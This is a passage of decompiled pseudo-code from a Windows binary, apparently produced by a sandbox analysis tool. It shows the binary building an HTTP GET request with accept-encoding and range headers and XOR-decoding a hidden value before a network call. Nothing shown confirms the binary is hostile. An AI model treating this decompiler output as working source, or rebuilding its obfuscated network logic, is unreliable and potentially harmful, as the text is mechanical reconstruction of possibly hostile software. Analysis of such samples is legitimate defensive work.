				 *((long long*)(_t909 + 0x58)) = _t759;
				_t760 = _t909 + 0x370;
				 *_t760 = 0xf314b140;
				 *((long long*)(_t760 + 8)) = 0xf3096a50;
				_t822 = _t909 + 0x110;
				 *_t822 = 0xf314b128;
				 *((long long*)(_t822 + 8)) = 0xf314b128;
				 *((long long*)(_t822 + 0x10)) = 0;
				 *((long long*)(_t822 + 0x20)) = _t760;
				 *((long long*)(_t822 + 0x28)) = 0xf314b128;
				E000007FE7FEF3051840(_t909 + 0x288, _t822);
				_t686 =  *0xf319c3f8; // 0x2
				_t609 = _t686 - 2;
				if (_t609 != 0) goto 0xf304d61a;
				_t901 =  *0xf319c400; // 0x335770
				asm("lock dec eax");
				if (_t609 <= 0) goto 0xf304d90e;
				_t748 =  *0xf319c408; // 0x7fef314b168
				_t687 = _t909 + 0x370;
				memcpy(_t571, _t592, 9);
				 *((intOrPtr*)(_t687 + 0x48)) =  *((intOrPtr*)(_t909 + 0x158));
				 *(_t909 + 0x210) =  *(_t909 + 0x310) & 0x0000ffff;
				 *((char*)(_t909 + 0x212)) =  *((intOrPtr*)(_t909 + 0x312));
				E000007FE7FEF305A520();
				if (_t687 == 0) goto 0xf304d92f;
				_t952 = _t687;
				 *((long long*)(_t909 + 0x48)) = _t748;
				 *(_t909 + 0x30) = _t901;
				 *_t952 = _t687;
				 *((long long*)(_t952 + 8)) = _t687;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x310], xmm0");
				memcpy(_t592 + 0x12, _t592, 9);
				 *((intOrPtr*)(_t909 + 0x158)) =  *((intOrPtr*)(_t909 + 0x3b8));
				 *((char*)(_t909 + 0xb2)) =  *((intOrPtr*)(_t909 + 0x212));
				 *(_t909 + 0xb0) =  *(_t909 + 0x210) & 0x0000ffff;
				_t859 = _t909 + 0x288;
				 *((intOrPtr*)(_t909 + 0x4c8)) =  *((intOrPtr*)(_t859 + 8));
				 *((long long*)(_t909 + 0x4c0)) =  *_t859;
				 *((intOrPtr*)(_t909 + 0xd8)) =  *((intOrPtr*)(_t909 + 0x468));
				_t690 =  *((intOrPtr*)(_t909 + 0x460));
				 *((long long*)(_t909 + 0xd0)) = _t690;
				_t825 =  *0xf319c018; // 0x346ef0
				_t910 =  *0xf319c028; // 0x73
				E000007FE7FEF30515F0(_t690, _t859, _t825, _t910);
				_t902 =  *((intOrPtr*)(_t859 + 0x10));
				if ( *_t859 != 0) goto 0xf304c0f4;
				E000007FE7FEF30694DF(0, _t690, _t902);
				_t959 = _t690;
				 *((long long*)(_t909 + 0x50)) = _t825;
				E000007FE7FEF30F1E10();
				if ( *((intOrPtr*)(_t909 + 0x290)) == 0) goto 0xf304c12b;
				HeapFree(??, ??, ??);
				memcpy(_t592 + 0x12, _t592, 9);
				 *((intOrPtr*)(_t909 + 0x3b8)) =  *((intOrPtr*)(_t909 + 0x158));
				 *(_t909 + 0x250) =  *(_t909 + 0xb0) & 0x0000ffff;
				 *((char*)(_t909 + 0x252)) =  *((intOrPtr*)(_t909 + 0xb2));
				 *(_t909 + 0x210) =  *((intOrPtr*)(_t909 + 0x4c0));
				 *((intOrPtr*)(_t909 + 0x218)) =  *((intOrPtr*)(_t909 + 0x4c8));
				_t693 =  *((intOrPtr*)(_t909 + 0xd0));
				 *((long long*)(_t909 + 0x260)) = _t693;
				 *((intOrPtr*)(_t909 + 0x268)) =  *((intOrPtr*)(_t909 + 0xd8));
				asm("movaps xmm0, [esp+0x310]");
				asm("movaps [esp+0x460], xmm0");
				E000007FE7FEF305A520();
				if (_t693 == 0) goto 0xf304d939;
				_t749 = _t693;
				 *_t749 = _t693;
				 *((long long*)(_t749 + 8)) = _t693;
				memcpy(_t592 + 0x12, _t592, 9);
				 *((intOrPtr*)(_t749 + 0x58)) =  *((intOrPtr*)(_t909 + 0x3b8));
				 *((char*)(_t749 + 0x5c)) = 4;
				 *((short*)(_t749 + 0x5d)) =  *(_t909 + 0x250) & 0x0000ffff;
				 *((char*)(_t749 + 0x5f)) =  *((intOrPtr*)(_t909 + 0x252));
				 *((long long*)(_t749 + 0x60)) = 0x1e;
				 *((intOrPtr*)(_t749 + 0x68)) = 0;
				 *((long long*)(_t749 + 0x6c)) =  *(_t909 + 0x210);
				 *((intOrPtr*)(_t749 + 0x74)) =  *((intOrPtr*)(_t909 + 0x218));
				 *((intOrPtr*)(_t749 + 0x78)) = 0x3b9aca00;
				_t828 =  *((intOrPtr*)(_t909 + 0x260));
				 *((long long*)(_t749 + 0x7c)) = _t828;
				 *((intOrPtr*)(_t749 + 0x84)) =  *((intOrPtr*)(_t909 + 0x268));
				 *((intOrPtr*)(_t749 + 0x88)) = 0x3b9aca00;
				 *((long long*)(_t749 + 0x90)) = 0x78;
				 *((intOrPtr*)(_t749 + 0x98)) = 0;
				 *((long long*)(_t749 + 0xa0)) = _t959;
				 *((long long*)(_t749 + 0xa8)) =  *((intOrPtr*)(_t909 + 0x50));
				 *((long long*)(_t749 + 0xb0)) = _t902;
				 *((long long*)(_t749 + 0xb8)) =  *(_t909 + 0x30);
				_t697 =  *((intOrPtr*)(_t909 + 0x48));
				 *((long long*)(_t749 + 0xc0)) = _t697;
				 *((intOrPtr*)(_t749 + 0xc8)) = 5;
				 *((short*)(_t749 + 0xcc)) = 0x100;
				 *((char*)(_t749 + 0xce)) = 0;
				E000007FE7FEF3074069(0xf30a5f90);
				E000007FE7FEF305A520();
				if (_t697 == 0) goto 0xf304d943;
				r15d = 8;
				E000007FE7FEF305A520();
				if (_t697 == 0) goto 0xf304d94d;
				 *_t697 = 0xf30a5f90;
				 *((long long*)(_t697 + 8)) = 0xf30a5f90;
				 *((long long*)(_t697 + 0x10)) = _t828;
				 *((char*)(_t697 + 0x18)) = 0;
				 *((long long*)(_t697 + 0x20)) = _t697;
				 *((long long*)(_t697 + 0x28)) = _t828;
				 *((long long*)(_t697 + 0x30)) = _t828;
				 *((long long*)(_t697 + 0x38)) = 0xf314b0b0;
				asm("xorps xmm0, xmm0");
				asm("movups [eax+0x40], xmm0");
				asm("movups [eax+0x50], xmm0");
				 *((long long*)(_t697 + 0x60)) = _t697;
				 *((long long*)(_t697 + 0x68)) = _t959;
				 *((long long*)(_t697 + 0x70)) = 0x64;
				 *((long long*)(_t697 + 0x78)) = 0xf30a5f90;
				 *((long long*)(_t697 + 0x80)) = _t952;
				 *((long long*)(_t697 + 0x88)) = 0xf314bcd8;
				 *((long long*)(_t697 + 0x90)) = _t959;
				asm("movaps xmm0, [esp+0x460]");
				asm("movups [eax+0x98], xmm0");
				 *((long long*)(_t909 + 0x300)) = _t749;
				 *((long long*)(_t909 + 0x308)) = _t697;
				if ( *((intOrPtr*)(_t909 + 0x288)) == 0) goto 0xf304c3ba;
				if ( *((long long*)(_t909 + 0x290)) == 0) goto 0xf304c3ba;
				HeapFree(??, ??, ??);
				_t830 =  *0xf319c000; // 0x3391d0
				_t914 =  *0xf319c010; // 0x32
				_t885 = _t909 + 0x110;
				E000007FE7FEF30515F0(_t697, _t885, _t830, _t914);
				_t940 =  *((intOrPtr*)(_t885 + 0x10));
				if ( *_t885 != 0) goto 0xf304c3ec;
				E000007FE7FEF30694DF(0, _t697, _t940);
				_t831 =  *((intOrPtr*)(_t909 + 0x118));
				E000007FE7FEF30F1E10();
				if ( *((intOrPtr*)(_t909 + 0x110)) == 0) goto 0xf304c431;
				_t620 =  *((long long*)(_t909 + 0x118));
				if (_t620 == 0) goto 0xf304c431;
				_t773 =  *0xf319cf20; // 0x2f0000
				HeapFree(??, ??, ??);
				asm("lock dec eax");
				if (_t620 <= 0) goto 0xf304d90e;
				 *((long long*)(_t909 + 0xc8)) = _t830;
				_t904 =  *((intOrPtr*)(_t909 + 0x308));
				asm("lock dec eax");
				if (_t620 <= 0) goto 0xf304d90e;
				E000007FE7FEF30694DF(0, _t697, _t773);
				_t751 = _t697;
				 *_t697 = 0x4547;
				 *((char*)(_t697 + 2)) = 0x54;
				E000007FE7FEF30694DF(0, _t697, _t940);
				_t866 = _t831;
				 *((long long*)(_t909 + 0xc0)) = _t697;
				_t917 = _t940;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t909 + 0x288)) =  *((intOrPtr*)(_t909 + 0x300));
				 *((long long*)(_t909 + 0x290)) = _t904;
				 *((long long*)(_t909 + 0x298)) = _t751;
				 *((long long*)(_t909 + 0x2a0)) = _t831;
				 *((long long*)(_t909 + 0x2a8)) = 3;
				 *((long long*)(_t909 + 0x2b0)) = _t697;
				 *((long long*)(_t909 + 0x2b8)) = _t866;
				 *((long long*)(_t909 + 0x2c0)) = _t940;
				 *((long long*)(_t909 + 0x2c8)) = 8;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x2d0], xmm0");
				 *((long long*)(_t909 + 0x2e0)) = 0x78;
				 *((intOrPtr*)(_t909 + 0x2e8)) = 0;
				 *((long long*)(_t909 + 0x4c0)) = 0;
				_t961 =  *((intOrPtr*)(_t909 + 0x2d8));
				_t948 = _t961 << 0x00000005 | 0x00000008;
				if (_t961 == 0) goto 0xf304c5e9;
				r8d = 8;
				_t833 =  *((intOrPtr*)(_t917 + 0x10));
				_t937 =  *((intOrPtr*)(_t917 + 0x18));
				if (_t937 - _t833 > 0) goto 0xf304d8e3;
				_t776 = _t937 + 1;
				if (_t833 - _t776 < 0) goto 0xf304d8ef;
				if (_t937 == 0) goto 0xf304d624;
				_t887 =  *_t917;
				bpl =  *(_t887 + _t751);
				_t580 = bpl & 0xffffffff;
				_t625 = _t866 - 0x21 - 0x3f;
				if (_t625 > 0) goto 0xf304c595;
				asm("dec ecx");
				if (_t625 >= 0) goto 0xf304c595;
				_t752 = _t751 + 1;
				if (_t937 != _t752) goto 0xf304c575;
				goto 0xf304c5d7;
				if (_t580 == 0x7c) goto 0xf304c58b;
				if (_t580 == 0x7e) goto 0xf304c58b;
				if (_t904 - 0x30 - 0xa < 0) goto 0xf304c58b;
				if (_t904 - 0x41 - 0x1a < 0) goto 0xf304c58b;
				bpl = bpl + 0x9f;
				if (bpl - 0x19 <= 0) goto 0xf304c58b;
				goto 0xf304d624;
				_t429 =  *(_t887 + _t776) & 0x000000ff;
				if (_t429 == 9) goto 0xf304c5d4;
				if (_t429 == 0x20) goto 0xf304c5d4;
				if (_t429 + 0xdf - 0x5d > 0) goto 0xf304d624;
				if (_t833 != _t776 + 1) goto 0xf304c5bc;
				if (_t917 + 0x20 != _t948) goto 0xf304c549;
				 *((long long*)(_t909 + 0x128)) = 0;
				asm("movaps [edx], xmm0");
				_t867 = _t909 + 0x310;
				E000007FE7FEF30BF31F(0, _t600 + 0x30, _t697, _t867, _t909 + 0x110, _t697, _t940);
				if ( *((intOrPtr*)(_t867 + 0x2c)) != 2) goto 0xf304c624;
				goto 0xf304c76f;
				_t698 = _t909 + 0x110;
				memcpy(_t580, _t592, 0xb);
				E000007FE7FEF30C47F5(_t698, _t697, _t940);
				if (_t698 == 0) goto 0xf304c74b;
				asm("movups xmm0, [esp+0x111]");
				asm("movaps [esp+0x210], xmm0");
				asm("movups xmm0, [esp+0x121]");
				asm("movaps [esp+0x220], xmm0");
				asm("movups xmm0, [esp+0x12c]");
				asm("movups [esp+0x22b], xmm0");
				_t512 =  *((intOrPtr*)(_t909 + 0x13c));
				asm("movups xmm0, [esp+0x140]");
				asm("movaps [esp+0x260], xmm0");
				asm("movups xmm0, [esp+0x150]");
				asm("movaps [esp+0x270], xmm0");
				 *((long long*)(_t909 + 0x280)) =  *((intOrPtr*)(_t909 + 0x160));
				if (_t512 == 2) goto 0xf304c76f;
				asm("movups xmm0, [esp+0x22b]");
				asm("movups [esp+0x38c], xmm0");
				asm("movaps xmm0, [esp+0x210]");
				asm("movaps xmm1, [esp+0x220]");
				asm("movups [esp+0x381], xmm1");
				asm("movups [esp+0x371], xmm0");
				asm("movaps xmm0, [esp+0x260]");
				asm("movaps xmm1, [esp+0x270]");
				asm("movups [esp+0x3a0], xmm0");
				asm("movups [esp+0x3b0], xmm1");
				 *((long long*)(_t909 + 0x3c0)) =  *((intOrPtr*)(_t909 + 0x280));
				 *((char*)(_t909 + 0x370)) =  *((intOrPtr*)(_t909 + 0x110));
				 *((intOrPtr*)(_t909 + 0x39c)) = _t512;
				 *((long long*)(_t909 + 0x438)) = 3;
				goto 0xf304c802;
				if ( *((long long*)(_t909 + 0x118)) == 0) goto 0xf304c76d;
				HeapFree(??, ??, ??);
				_t869 = _t909 + 0x260;
				 *_t869 = 0;
				_t699 = _t909 + 0x210;
				 *_t699 = _t869;
				 *((long long*)(_t699 + 8)) = 0xf30c4864;
				_t837 = _t909 + 0x310;
				 *_t837 = 0xf314b530;
				 *((long long*)(_t837 + 8)) = 0xf314b530;
				 *((long long*)(_t837 + 0x10)) = _t752;
				 *((long long*)(_t837 + 0x20)) = _t699;
				 *((long long*)(_t837 + 0x28)) = 0xf314b530;
				_t889 = _t909 + 0x110;
				E000007FE7FEF3051840(_t889, _t837);
				 *((intOrPtr*)(_t889 + 0x44)) = 2;
				 *((long long*)(_t889 + 0x70)) = _t752;
				 *((char*)(_t889 + 0x80)) = 0;
				 *((long long*)(_t889 + 0xc8)) = 2;
				r8b =  *_t869;
				E000007FE7FEF30B4CED(_t592 + 0x16, _t592, _t600 + 0x3c, _t699, _t909 + 0x370, _t889);
				_t890 =  *((intOrPtr*)(_t909 + 0x380));
				asm("movups xmm0, [esp+0x388]");
				asm("movaps [esp+0xd0], xmm0");
				 *((intOrPtr*)(_t909 + 0xe0)) =  *((intOrPtr*)(_t909 + 0x398));
				 *((intOrPtr*)(_t909 + 0xe4)) =  *((intOrPtr*)(_t909 + 0x39c));
				_t700 =  *((intOrPtr*)(_t909 + 0x3a0));
				 *(_t909 + 0xe8) = _t700;
				asm("movups xmm0, [esp+0x3a4]");
				asm("movups [esp+0xec], xmm0");
				asm("movups xmm0, [esp+0x3b8]");
				asm("movaps [esp+0xb0], xmm0");
				if (0 != 3) goto 0xf304d957;
				 *((long long*)(_t909 + 0x460)) =  *((intOrPtr*)(_t909 + 0x370));
				 *((long long*)(_t909 + 0x468)) =  *((intOrPtr*)(_t909 + 0x378));
				 *((long long*)(_t909 + 0x470)) = _t890;
				asm("movaps xmm0, [esp+0xd0]");
				_t840 =  *(_t909 + 0xe8);
				asm("movups [esp+0x478], xmm0");
				 *((intOrPtr*)(_t909 + 0x488)) =  *((intOrPtr*)(_t909 + 0xe0));
				 *((intOrPtr*)(_t909 + 0x48c)) =  *((intOrPtr*)(_t909 + 0xe4));
				 *((long long*)(_t909 + 0x490)) = _t840;
				asm("movups xmm0, [esp+0xec]");
				asm("movups [esp+0x494], xmm0");
				 *((intOrPtr*)(_t909 + 0x4a4)) =  *((intOrPtr*)(_t909 + 0x3b4));
				asm("movaps xmm0, [esp+0xb0]");
				asm("movups [esp+0x4a8], xmm0");
				 *(_t909 + 0x30) = _t961;
				if (_t961 == 0) goto 0xf304ca0e;
				r15d = 8;
				_t786 = _t961;
				E000007FE7FEF30A6772(_t786);
				if (_t840 == 5) goto 0xf304c9a0;
				if (_t840 != 0xf) goto 0xf304ca01;
				_t546 = (_t786 - 0x00000041 & 0xffffff00 | _t786 - 0x00000041 - 0x0000001a > 0x00000000) << 0x00000005 |  *_t700;
				if (_t546 != 0x61) goto 0xf304ca01;
				if (0xffffffff == 0xd) goto 0xf304ca98;
				sil = _t700[0];
				dil =  *(0xffffffff + "accept-encodinggziprangeRequest deadline overflowed" + 2);
				_t487 = (_t890 - 0x00000041 & 0xffffff00 | _t890 - 0x00000041 - 0x0000001a > 0x00000000) << 0x00000005 | sil;
				if (_t487 == ((_t546 & 0xffffff00 | bpl - 0x0000001a > 0x00000000) << 0x00000005 | dil)) goto 0xf304c95b;
				if (0xffffffff - 0xd <= 0) goto 0xf304ca01;
				goto 0xf304ca98;
				_t553 = 0xffffffad << 0x00000005 |  *_t700;
				if (_t553 != 0x72) goto 0xf304ca01;
				if (0xffffffff == 3) goto 0xf304ca98;
				sil = _t700[0];
				bpl =  *(0xffffffff + "rangeRequest deadline overflowed" + 2);
				if (((_t487 & 0xffffff00 | bpl - 0x0000001a > 0x00000000) << 0x00000005 | sil) == ((_t553 & 0xffffff00 | dil - 0x0000001a > 0x00000000) << 0x00000005 | bpl)) goto 0xf304c9bc;
				if (0 - 4 >= 0) goto 0xf304ca98;
				if (_t961 + 0x20 != _t948) goto 0xf304c923;
				 *((long long*)(_t909 + 0x20)) = 4;
				r8d = 0xf;
				E000007FE7FEF30B4DD8(_t909 + 0x110, "accept-encodinggziprangeRequest deadline overflowed",  *((intOrPtr*)(_t909 + 0x110)),  &M000007FE7FEF314BC40);
				if ( *(_t909 + 0x30) !=  *((intOrPtr*)(_t909 + 0x2d0))) goto 0xf304ca63;
				_t891 = _t909 + 0x2c8;
				E000007FE7FEF30B1E0C( *(_t909 + 0x30) -  *((intOrPtr*)(_t909 + 0x2d0)), _t891,  *(_t909 + 0x30));
				goto 0xf304ca70;
				_t844 =  *(_t891 + 0x10) << 5;
				asm("movups xmm0, [esp+0x110]");
				asm("movups xmm1, [esp+0x120]");
				asm("movups [ecx+edx+0x10], xmm1");
				asm("movups [ecx+edx], xmm0");
				 *((long long*)(_t909 + 0x2d8)) =  *((intOrPtr*)(_t909 + 0x2d8)) + 1;
				_t446 =  *((intOrPtr*)(_t909 + 0x2e8));
				_t892 =  *((intOrPtr*)(_t909 + 0x288));
				if (_t446 != 0x3b9aca00) goto 0xf304cab8;
				_t585 =  *(_t892 + 0x98);
				if (_t585 == 0x3b9aca00) goto 0xf304cb1e;
				_t705 =  ==  ? _t892 + 0x90 : _t909 + 0x2e0;
				_t447 = E000007FE7FEF30A3B10(8, _t592, _t844);
				if (_t446 - 0x3b9aca00 < 0) goto 0xf304db22;
				_t558 = 0x3b9aca00 + _t585;
				_t664 = _t558 - 0x3b9aca00;
				if (_t664 < 0) goto 0xf304cafe;
				if (_t664 == 0) goto 0xf304db22;
				 *((long long*)(_t909 + 0x4f0)) = ( ==  ? _t892 + 0x90 : _t909 + 0x2e0) +  *((intOrPtr*)( ==  ? _t892 + 0x90 : _t909 + 0x2e0)) + 1;
				 *((intOrPtr*)(_t909 + 0x4f8)) = _t558 + 0xc4653600 - (_t558 + 0xc4653600 >> 9) * 0x3b9aca00;
				_t708 =  *((intOrPtr*)(_t909 + 0x290));
				_t665 =  *(_t708 + 0xa0);
				if (_t665 == 0) goto 0xf304cc49;
				asm("lock dec eax");
				if (_t665 <= 0) goto 0xf304d90e;
				asm("lock dec eax");
				if (_t665 <= 0) goto 0xf304d90e;
				 *(_t909 + 0x250) = _t892;
				 *((long long*)(_t909 + 0x258)) = _t708;
				_t797 =  *((intOrPtr*)(_t708 + 0x90));
				_t711 = ( *(_t708 + 0xa0) << 4) + _t797;
				 *(_t909 + 0xb0) = _t797;
				 *((long long*)(_t909 + 0xb8)) = _t711;
				E000007FE7FEF305A520();
				if (_t711 == 0) goto 0xf304dba1;
				_t755 = _t711;
				asm("movups xmm0, [esp+0x4c0]");
				asm("movups xmm1, [esp+0x4d0]");
				asm("movups xmm2, [esp+0x4e0]");
				asm("movups [eax+0x20], xmm2");
				asm("movups [eax+0x10], xmm1");
				asm("movups [eax], xmm0");
				 *((long long*)(_t755 + 0x30)) = _t909 + 0x460;
				_t713 = _t909 + 0x4f0;
				 *((long long*)(_t755 + 0x38)) = _t713;
				_t955 = _t909 + 0xb0;
				E000007FE7FEF30B65EE(_t447, _t955);
				if (_t713 == 0) goto 0xf304ce62;
				memcpy(_t585, _t592, 0xd);
				_t936 = _t909 + 0xd0;
				 *_t936 = _t955;
				 *((long long*)(_t936 + 8)) = 0xf314bc68;
				 *((long long*)(_t936 + 0x10)) = _t755;
				 *((long long*)(_t936 + 0x18)) = 0xf314bca0;
				 *((intOrPtr*)(_t844 + 0x20))();
				goto 0xf304ce9f;
				asm("movups xmm0, [esp+0x4c0]");
				asm("movups xmm1, [esp+0x4d0]");
				asm("movups xmm2, [esp+0x4e0]");
				_t846 = _t909 + 0x310;
				asm("movaps [edx+0x20], xmm2");
				asm("movaps [edx+0x10], xmm1");
				asm("movaps [edx], xmm0");
				 *((long long*)(_t846 + 0x30)) = _t909 + 0x460;
				 *((long long*)(_t846 + 0x38)) = _t909 + 0x4f0;
				memcpy(_t592 + 0x1a, _t592, 0xd);
				_t589 = _t592 + 0x1a;
				_t895 = _t909 + 0x110;
				E000007FE7FEF30B4FBA(8, _t589, _t592, _t890 - 0x41, _t600 + 0x54, _t895, _t846, _t909 + 0x370); // executed
				if ( *_t895 != 0) goto 0xf304dd93;
				 *((long long*)(_t909 + 0x60)) =  *((intOrPtr*)(_t909 + 0x118));
				 *((long long*)(_t909 + 0x50)) =  *((intOrPtr*)(_t909 + 0x120));
				 *((long long*)(_t909 + 0x68)) =  *((intOrPtr*)(_t909 + 0x128));
				asm("movups xmm0, [esp+0x130]");
				asm("movaps [esp+0xd0], xmm0");
				asm("movups xmm0, [esp+0x140]");
				asm("movaps [esp+0xe0], xmm0");
				asm("movups xmm0, [esp+0x14c]");
				asm("movups [esp+0xec], xmm0");
				 *((intOrPtr*)(_t909 + 0x3c)) =  *((intOrPtr*)(_t909 + 0x15c));
				asm("movups xmm0, [esp+0x160]");
				asm("movaps [esp+0x260], xmm0");
				 *((long long*)(_t909 + 0x80)) =  *((intOrPtr*)(_t909 + 0x170));
				 *((long long*)(_t909 + 0x90)) =  *((intOrPtr*)(_t909 + 0x180));
				 *((long long*)(_t909 + 0x78)) =  *((intOrPtr*)(_t909 + 0x188));
				 *((long long*)(_t909 + 0x48)) =  *((intOrPtr*)(_t909 + 0x198));
				 *((long long*)(_t909 + 0xa8)) =  *((intOrPtr*)(_t909 + 0x1a8));
				 *((long long*)(_t909 + 0xa0)) =  *((intOrPtr*)(_t909 + 0x1b0));
				 *(_t909 + 0x30) =  *((intOrPtr*)(_t909 + 0x1b8));
				 *((intOrPtr*)(_t909 + 0x88)) =  *((intOrPtr*)(_t909 + 0x1f2));
				_t455 =  *(_t909 + 0x1f6) & 0x0000ffff;
				 *(_t909 + 0xb4) = _t455;
				 *(_t909 + 0x8c) = _t455;
				asm("movaps xmm0, [esp+0xd0]");
				asm("movaps xmm1, [esp+0xe0]");
				asm("movaps [esp+0x210], xmm0");
				asm("movaps [esp+0x220], xmm1");
				asm("movups xmm0, [esp+0xec]");
				asm("movups [esp+0x22c], xmm0");
				asm("movaps xmm0, [esp+0x260]");
				asm("movaps [esp+0x500], xmm0");
				 *((long long*)(_t909 + 0x98)) =  *((intOrPtr*)(_t909 + 0x1c8));
				 *((long long*)(_t909 + 0x70)) =  *((intOrPtr*)(_t909 + 0x1e0));
				goto 0xf304d05e;
				memcpy(_t589,  *(_t909 + 0x1f0) & 0x0000ffff, 0xd);
				E000007FE7FEF30B65B8(( *(_t909 + 0x1f0) & 0x0000ffff) + 0x1a,  *(_t909 + 0x1f0) & 0x0000ffff, _t600 + 0x60, _t909 + 0x110, _t909 + 0x370);
				HeapFree(??, ??, ??);
				if ( *((long long*)(_t909 + 0x110)) != 0) goto 0xf304dbb2;
				 *((long long*)(_t909 + 0x60)) =  *((intOrPtr*)(_t909 + 0x118));
				 *((long long*)(_t909 + 0x50)) =  *((intOrPtr*)(_t909 + 0x120));
				 *((long long*)(_t909 + 0x68)) =  *((intOrPtr*)(_t909 + 0x128));
				asm("movups xmm0, [esp+0x130]");
				asm("movaps [esp+0x310], xmm0");
				asm("movups xmm0, [esp+0x140]");
				asm("movaps [esp+0x320], xmm0");
				asm("movups xmm0, [esp+0x14c]");
				asm("movups [esp+0x32c], xmm0");
				 *((intOrPtr*)(_t909 + 0x3c)) =  *((intOrPtr*)(_t909 + 0x15c));
				asm("movups xmm0, [esp+0x160]");
				asm("movaps [esp+0x260], xmm0");
				 *((long long*)(_t909 + 0x80)) =  *((intOrPtr*)(_t909 + 0x170));
				 *((long long*)(_t909 + 0x90)) =  *((intOrPtr*)(_t909 + 0x180));
				 *((long long*)(_t909 + 0x78)) =  *((intOrPtr*)(_t909 + 0x188));
				 *((long long*)(_t909 + 0x48)) =  *((intOrPtr*)(_t909 + 0x198));
				 *((long long*)(_t909 + 0xa8)) =  *((intOrPtr*)(_t909 + 0x1a8));
				 *((long long*)(_t909 + 0xa0)) =  *((intOrPtr*)(_t909 + 0x1b0));
				 *(_t909 + 0x30) =  *((intOrPtr*)(_t909 + 0x1b8));
				_t460 =  *((intOrPtr*)(_t909 + 0x1f2));
				 *((intOrPtr*)(_t909 + 0x108)) = _t460;
				 *((intOrPtr*)(_t909 + 0x88)) = _t460;
				_t461 =  *(_t909 + 0x1f6) & 0x0000ffff;
				 *(_t909 + 0x10c) = _t461;
				 *(_t909 + 0x8c) = _t461;
				asm("movaps xmm0, [esp+0x310]");
				asm("movaps xmm1, [esp+0x320]");
				asm("movaps [esp+0x210], xmm0");
				asm("movaps [esp+0x220], xmm1");
				asm("movups xmm0, [esp+0x32c]");
				asm("movups [esp+0x22c], xmm0");
				asm("movaps xmm0, [esp+0x260]");
				asm("movaps [esp+0x500], xmm0");
				 *((long long*)(_t909 + 0x98)) =  *((intOrPtr*)(_t909 + 0x1c8));
				_t943 =  *((intOrPtr*)(_t909 + 0x1d8));
				_t739 =  *((intOrPtr*)(_t909 + 0x1e0));
				 *((long long*)(_t909 + 0x70)) = _t739;
				_t594 =  *(_t909 + 0x1f0) & 0x0000ffff;
				E000007FE7FEF30428BC( *((long long*)(_t909 + 0x110)), _t909 + 0x250);
				 *(_t909 + 0x2e) = _t594;
				 *((long long*)(_t909 + 0x208)) = _t739;
				sil = (_t594 & 0x0000ffff) - 0x190 >= 0;
				asm("movups xmm0, [esp+0x22c]");
				asm("movups [esp+0x38c], xmm0");
				asm("movaps xmm0, [esp+0x210]");
				asm("movaps xmm1, [esp+0x220]");
				asm("movaps [esp+0x380], xmm1");
				asm("movaps [esp+0x370], xmm0");
				asm("movaps xmm0, [esp+0x500]");
				asm("movaps [esp+0x2f0], xmm0");
				 *((intOrPtr*)(_t909 + 0x40)) =  *((intOrPtr*)(_t909 + 0x88));
				 *((short*)(_t909 + 0x44)) =  *(_t909 + 0x8c) & 0x0000ffff;
				if ( *((long long*)(_t909 + 0x468)) == 0) goto 0xf304d0f3;
				HeapFree(??, ??, ??);
				if (_t909 + 0x288 != 0) goto 0xf304dab5;
				 *((long long*)(_t909 + 0x110)) = 0xf30f9b08;
				_t741 =  *((intOrPtr*)(_t909 + 0x110));
				asm("dec eax");
				_t926 = _t909 + 0x370;
				 *_t926 = 0x3fdea799 ^  *(_t741 + 0x471329df);
				_t926[1] = 0xe52bdc98 ^  *(_t741 + 0xffffffff471329e7);
				_t926[1] =  *(_t741 + 0x471329df -  *0xf319c2e8 + 0xc) & 0x0000ffff ^ 0x0000eb44;
				r9d = 0xe;
				E000007FE7FEF30B7D80(0, _t741,  *((intOrPtr*)(_t909 + 0x48)),  *((intOrPtr*)(_t909 + 0xa8)), _t926, _t936);
				if (_t741 == 0) goto 0xf304dad7;
				_t908 = _t909 + 0x110;
				_t851 = _t741;
				E000007FE7FEF3058B70(0, _t741, _t908, _t851,  *((intOrPtr*)(_t909 + 0xa8)), _t937, _t938);
				if ( *_t908 != 0) goto 0xf304daf1;
				E000007FE7FEF306239E(_t741,  *((intOrPtr*)(_t909 + 0x118))); // executed
				_t812 =  *((intOrPtr*)(_t909 + 0x58));
				 *_t812 = _t741;
				 *((long long*)(_t812 + 8)) = _t851;
				 *((long long*)(_t812 + 0x10)) = 0;
				if ( *((long long*)(_t909 + 0x50)) == 0) goto 0xf304d1e4;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t909 + 0x178)) == 0) goto 0xf304d200;
				HeapFree(??, ??, ??);
				E000007FE7FEF3073C6C( *((intOrPtr*)(_t909 + 0x48)),  *((intOrPtr*)(_t909 + 0xa8)));
				if ( *((intOrPtr*)(_t909 + 0x1a0)) == 0) goto 0xf304d222;
				HeapFree(??, ??, ??);
				E000007FE7FEF30A7A75();
				HeapFree(??, ??, ??);
				E000007FE7FEF30A7B3C( *((intOrPtr*)(_t909 + 0x98)), _t943);
				if ( *((intOrPtr*)(_t909 + 0x1d0)) == 0) goto 0xf304d26e;
				HeapFree(??, ??, ??);
				_t742 =  *((intOrPtr*)(_t909 + 0x58));
				_t758 =  *((intOrPtr*)(_t742 + 8));
				_t900 =  *((intOrPtr*)(_t742 + 0x10));
				r12d = 0x989680;
				asm("xorps xmm6, xmm6");
				 *((long long*)(_t909 + 0x48)) = _t758;
				if (_t900 == _t758) goto 0xf304d3b8;
				_t745 =  *((intOrPtr*)( *((intOrPtr*)(_t909 + 0x58)))) + _t900;
				_t855 = _t758 - _t900;
				 *((long long*)(_t909 + 0x288)) = _t745;
				 *((long long*)(_t909 + 0x290)) = _t855;
				 *((long long*)(_t909 + 0x298)) = 0;
				 *((long long*)(_t909 + 0x2a0)) = _t908;
				if (_t943 == 0) goto 0xf304d584;
				if (_t943 - _t855 <= 0) goto 0xf304d313;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t909 + 0x1c0)) + 0x48))();
				if (_t745 == 0) goto 0xf304d3db;
				goto __rax;
			}

0x7fef304bf33
0x7fef304bf3b
0x7fef304bf47
0x7fef304bf4f
0x7fef304bf59
0x7fef304bf64
0x7fef304bf6c
0x7fef304bf74
0x7fef304bf78
0x7fef304bf80
0x7fef304bf84
0x7fef304bf90
0x7fef304bf95
0x7fef304bf9c
0x7fef304bfa0
0x7fef304bfa6
0x7fef304bfad
0x7fef304bfb2
0x7fef304bfb8
0x7fef304bfbf
0x7fef304bfda
0x7fef304bfe0
0x7fef304bfeb
0x7fef304bffa
0x7fef304c01b
0x7fef304c023
0x7fef304c029
0x7fef304c02c
0x7fef304c031
